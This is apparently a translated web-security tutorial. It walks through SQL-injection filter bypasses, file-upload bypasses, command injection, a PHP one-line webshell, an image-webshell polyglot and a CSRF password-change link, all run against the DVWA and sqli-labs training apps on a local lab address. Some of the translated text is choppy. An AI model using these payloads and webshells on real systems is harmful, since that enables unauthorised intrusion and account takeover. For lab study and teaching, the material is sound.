If there are any errors in this article or you have any suggestions, please feel free to contact me, thank you! 1. Programmers will consciously set up defenses or perform security tests to block web injections when writing code. Blacklist filtering technology 1. Filter common keywords in SQL key fields: and, or, union all select, quotation marks, spaces, etc. There are also some similar techniques that are not filtering but using escape functions or stripping illegal keywords. Bypass method:
2. File upload vulnerability When we surf the Internet, we often use the file upload function, such as uploading an avatar picture, uploading a file, uploading a video, etc. I know that this is a normal function, but have you ever thought about how the server processes or parses these files after they are uploaded? If the server is not secure enough when processing these uploaded files, it will lead to security incidents, such as: Uploading a web script file for the server to execute
File upload vulnerability core For a file upload attack to be successful, two elements must generally be met:
Implementing the core - upload bypass technology Generally speaking, the detection techniques encountered when uploading files are:
Client-side detection bypass (javascript detection) This type of detection usually contains javascript code on the upload page that specifically detects file uploads. The most common thing is to detect whether the extension is legal. This type of bypass is very simple. Server-side detection bypass (MIME type detection) This detection is performed on the server, and the main check is the content-type value (whitelist or blacklist). Of course, this bypass is also simple. Server detection bypass (directory path detection) This detection is performed on the server, and generally checks whether the path is legal, but there is no defense for any slightly special ones. For example, shell.php.[\0].png [\0], 123.php0x00.png, where 0x00 is the truncation character of PHP and C languages, which means that when the server reads the file and encounters [\0] when reading shell.php, it will terminate the file and execute it as shell.php. There is also a similar post submission file shell.php%00.png Server-side detection bypass (file extension detection) As the name implies, it checks the file extension, usually through whitelist and blacklist defense. 1. Blacklist, for example, the extension cannot contain html, php, php3, php4, asp, exe, bat, jsp + file name case bypass using file names like AsP, pHp to bypass blacklist detection
2. The whitelist is relatively safer than the blacklist, but it is not necessarily absolutely safe. (1) 0x00 truncation bypass Use the method of test.asp%00.jpg to truncate, which belongs to the whitelist file, and then use the detection logic vulnerability of the server code to attack. At present, I have only encountered this vulnerability in asp programs + parsing call/vulnerability bypass. This type of vulnerability can be directly uploaded with a whitelist file with code injection, and then use the parsing call/vulnerability (2) .htaccess file attack In the PHP manual, it is mentioned in the move_uploaded_file section that there is a warning which states 'If the destination file already exists, it will be overwritten.' If PHP security is not configured properly, you can use the move_uploaded_file function to overwrite the .htaccess file on the server with your own file. This way, you can define the parsing list arbitrarily. Server-side detection bypass (file content detection) If the file content detection is set more strictly, then the upload attack will become very difficult. It can also be said that it is the last level of detection at the code layer. If it is broken, even if there is no vulnerability in the code layer, it will bring opportunities to exploit the parsing vulnerability in the application layer later. (1) The file magic number check mainly detects the file magic number at the beginning of the file content, for example: to bypass jpg Value = FF D8 FF E0 00 10 4A 46 49 46. To bypass the magic number detection for gif files Value = 47 49 46 38 39 61 To bypass the magic number detection for png files Value = 89 50 4E 47 (2) File-related information detection The getimagesize() function is commonly used to detect image file related information. You only need to forge the file header part. That is, on the basis of the magic number, some file information is added. It is a bit like the following structure GIF89a (...some binary data for image...) <?php phpinfo(); ?> (... skipping the rest of binary data ...) (3) File loading detection This is the most abnormal detection. Generally, it calls API or function to perform file loading test. The most common one is image rendering test. The more abnormal one even performs secondary rendering. The attack method for rendering/loading test is code injection bypass. The attack method for secondary rendering is to attack the file loader itself. three, 1. (1) Copy the corresponding URL below, click Load URL, and then click Execute (2) Construct a closure and get the database name – dvwa. Then, follow the previous routine and find that the system reports an error. The error message is as follows The system automatically adds the \ symbol, which means an error occurs in the constructed function. We should avoid this phenomenon so that the system does not automatically add special symbols to the constructor. In this case, you can use hex code to convert the string dvwa into hexadecimal (to 0x...), so that the single quote symbol will not be used in the constructor. At this time, the system will no longer automatically add special characters to the constructor, destroying the constructor. (3) Similarly, use the SQL statement used previously to extract the data. 2. Take Less-25 as an example (1) http://192.168.122.130/sqli-labs-master/Less-25/?id=-1' union all select 1,2,database()--+ //Construct closure according to the echo, and burst out database() (2) http://192.168.122.130/sqli-labs-master/Less-25/?id=-1' union all select 1,table_name,column_name from infoorrmation_schema.columns where table_name = table_name and table_schema = database()--+ //Expose table name table_name, column name column_name (3) http://192.168.122.130/sqli-labs-master/Less-25/?id=-1' union all select 3,2,id from emails--+ //Blast data Summary: First, we continuously construct closed inputs and observe the echo. We find that the system filters the "and" string and "+" (+ is equivalent to the space bar) Then we guess that we can use mixed case and, or interlaced and discontinuous and, or use other characters instead of and - such as && (the main purpose is to use and), or use hex code or urlencode conversion methods; similarly, the string "or", or or appearing in a word (such as information) can also use the above method. The key is to bypass the system's filtering and achieve a certain purpose 3. Take Less-26 as an example The and character is the same as Less-25. The spaces to be filtered out can be %20 -- space, or the encoding of the TAB key, or the encoding of the newline key. 4. Take http://192.168.122.130/DVWA-1.9/vulnerabilities/exec/ as an example. The interface is as follows. It is a pingable interface. There is a vulnerability in this interface, which means that you can use the connection symbol to complete other actions while pinging. When you enter 127.0.0.1 || pwd in the input bar, the following situation occurs The current file directory appears in the interface, and then we can use this vulnerability to obtain some desired data. Here we mention the "One Sentence Trojan" echo '<?php @eval($_POST[123]);?>' > 123.php [Sometimes, in order to prevent the victim from discovering, other forms of sentences are often used together with the "one-sentence Trojan" <?php fputs(fopen("345.php","w")),<?php @eval($_POST[1234]);?>' >1234.php 4. Combining File Inclusion and File Upload to Implement Attack (1) Select DVWA security as Low at http://192.168.122.130/DVWA-1.9/security.php Use Chinese Chopper to add the following code: echo '<?php @eval($_POST[123]);?>' > 123.php Then you can get the directory through China Chopper as follows: (2) Select DVWA security as Medium at http://192.168.122.130/DVWA-1.9/security.php Manually set browser proxy Start BurpLoader and rename the captured packets! Then select Action->Send to Repeater, then click Go in Repeater. Observe the window on the right and you will find that the file has been uploaded. Open China Chopper and access it according to the previous steps. (3) Select DVWA security as High at http://192.168.122.130/DVWA-1.9/security.php First, if you see that the picture has been uploaded, then the uploaded picture must have been processed (a sentence Trojan has been added). That is, open the picture encoding tool winhex, add a sentence Trojan to the encoding tool, and regenerate a new encoded picture. Of course, you can also use the cmd command: copy 1.png/b+123.php /a TCP.png. Here 1.png is a normal picture, 123.php is a sentence Trojan. Recompose them into a new picture named TCP.png, and then upload it to succeed (cmd is used above). After the image is uploaded, it cannot be captured and renamed like the Medium level. There should be corresponding security processing on the web server side. 5. Ideas for dealing with some abnormal levels: compare, observe what has not changed before and after uploading (through binary anomalies), and then make certain modifications to the uploaded data to achieve a certain purpose.
6. CSRF: Cross site Request Forgery (using cookie value) Construct a URL to trick the victim into clicking on the link, and then use the victim's cookies to enable the victim to change the password without the victim's knowledge http://192.168.122.130/DVWA-1.9/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=Change# For example: For example, a hacker uses his own account password to log in to a website, then clicks on the password change interface and constructs a password change URL. When the hacker wants to launch an attack, he induces a victim (who has previously used a browser to log in to the website and has cookies stored in the browser) to click on the previously constructed URL, and then changes the password without the victim's knowledge. The hacker knows this password. If the attack is successful at this time, the hacker can use the password constructed when constructing the URL before to log in to the website as the victim and perform a series of operations! Some current defenses: 1. You can use verification code for defense 2. Websites that require the original password to change the password 3. Defense method: no-referrer-when-downgrade Linking from one website to another will generate a new HTTP request. Referrer is a field in the HTTP request that indicates the source. 4. The anti-counterfeiting mechanism token, unlike cookies, can block most CSRF attacks (everyone has an anti-counterfeiting code, which others cannot guess. If you want to change your password, you must use your own token to succeed) - the token needs to be irregular and preferably encrypted. The above is the detailed SQL injection security integration introduced by the editor. I hope it will be helpful to everyone. If you have any questions, please leave me a message and the editor will reply to you in time. I would also like to thank everyone for their support of the 123WORDPRESS.COM website! You may also be interested in:
|
<<: Detailed tutorial on installing Tomcat9 windows service
>>: Simple steps to write custom instructions in Vue3.0
Normal explanation % means any client can connect...
1. What is Docker? Everyone knows about virtual m...
This article is mainly to take you to quickly und...
Table of contents Preface 1. Technical Principle ...
Table of contents Preface 1. Configure gzip compr...
Page replacement algorithm: The essence is to mak...
I will explain the installation of MySQL under Wi...
1. Oracle is a large database while MySQL is a sm...
Table of contents animate() animation method Anim...
Table of contents Achieve results Implementation ...
Restart all stopped Docker containers with one co...
This article shares the specific code of vue elem...
MySQL deployment Currently, the company deploys M...
Table of contents 1. Forgot the root password and...
The GROUP BY statement is used in conjunction wit...